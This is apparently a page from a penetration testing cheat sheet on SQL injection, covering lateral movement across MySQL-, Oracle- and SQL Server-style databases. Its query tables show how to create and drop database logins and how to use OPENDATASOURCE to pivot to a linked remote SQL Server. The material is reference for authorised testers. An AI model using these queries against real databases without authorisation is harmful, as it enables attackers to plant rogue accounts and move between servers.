Lateral Movement

Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.

* Requires privileged user

Description Query
Create Users CREATE USER 'netspi'@'%' IDENTIFIED BY 'password'
Drop User DROP USER netspi

Lateral Movement

Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.

Description Query
Create Users CREATE USER user IDENTIFIED by pass;
Drop Users DROP USER user

Lateral Movement

Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.

* Requires privileged user

Description Query
Create Users EXEC sp_addlogin 'user', 'pass';
Drop Users EXEC sp_droplogin 'user';
Link crawling https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Connect to remote database as current service --Requires sysadmin
SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;').master.dbo.sysdatabases

© 2018 Copyright by NetSPI. All rights reserved.